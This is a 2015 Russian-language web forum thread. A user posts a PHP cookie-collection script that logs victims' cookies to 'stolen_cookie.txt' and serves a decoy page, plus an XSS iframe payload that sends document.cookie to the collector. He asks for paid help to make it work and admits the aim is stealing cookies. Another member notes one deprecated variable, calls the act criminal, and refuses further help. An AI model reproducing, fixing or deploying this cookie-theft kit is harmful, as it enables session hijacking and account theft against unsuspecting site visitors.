Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 28.10.2015, 14:23
Новичок на форуме
Отправить личное сообщение для Johny13 Посмотреть профиль Найти все сообщения от Johny13
 
Регистрация: 28.10.2015
Сообщений: 3

Не исполняется скрипт collect_cookie.php
На просторах сети нашел такой PHP скрипт collect_cookie.php

<?php
$collectedCookie=$HTTP_GET_VARS["cookie"];
$date=date("l ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('stolen_cookie.txt','a');
fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$cookie \n");
fclose($file);
echo '<b>Извините, сайт находится в состоянии разработки. </b></br></br>Пожалуйста, нажмите<a
href="http://www.google.com/">здесь</a>, чтобы перейти на предыдущую страницу';
?>

к которому предлагается использовать следующий скрипт, размещаемый на любой странице, которая может быть открыта пользователем
<iframe width='0' height='0' frameborder='0'
src='<script>document.location='http://127.0.0.1/collect_cookie.php?
cookie='+escape(document.cookie);</script>' />

Я его устанавливал, но он у меня не заработал.
Вопрос: Не устарел ли он, рабочий?
С меня денежная благодарность, если кто то объяснит, что нужно, что бы он заработал или более правильная его реализация
Ответить с цитированием
  #2 (permalink)  
Старый 28.10.2015, 15:00
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

$HTTP_GET_VARS - давно устарело и не рекомендуется к использованию.

Вам это зачем нужно, для "своровать куки"?
Ответить с цитированием
  #3 (permalink)  
Старый 28.10.2015, 15:05
Новичок на форуме
Отправить личное сообщение для Johny13 Посмотреть профиль Найти все сообщения от Johny13
 
Регистрация: 28.10.2015
Сообщений: 3

Да, а как актуально?
Ответить с цитированием
  #4 (permalink)  
Старый 28.10.2015, 15:33
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Воровство кук, это наказуемое деяние, вам это известно?
Ответить с цитированием
  #5 (permalink)  
Старый 28.10.2015, 18:59
Новичок на форуме
Отправить личное сообщение для Johny13 Посмотреть профиль Найти все сообщения от Johny13
 
Регистрация: 28.10.2015
Сообщений: 3

Известно, спасибо! совет дельный дадите или дальше будете запугивать себя?
Ответить с цитированием
  #6 (permalink)  
Старый 28.10.2015, 20:21
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Нет не дам, своими руками плодить горе хацкеров нет никакого желания.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PHP/AJAX скрипт "Нaселение мoегo гoрoдa oнлaйн" rustik-yes Работа 2 01.12.2014 22:53
2 компьютера 1 хром и 1 скрипт Megatron13 Opera, Safari и др. 1 21.07.2013 19:12
Почему скрипт не работает с данными, которые вернул другой скрипт? Rooner jQuery 3 20.09.2012 14:56
Изменить скрипт Изучаю_JS Общие вопросы Javascript 0 12.02.2012 22:05
А как зделать скрипт, чтобы например скрипт 1 заменялся скриптом 2? yura371 Общие вопросы Javascript 3 06.01.2009 22:40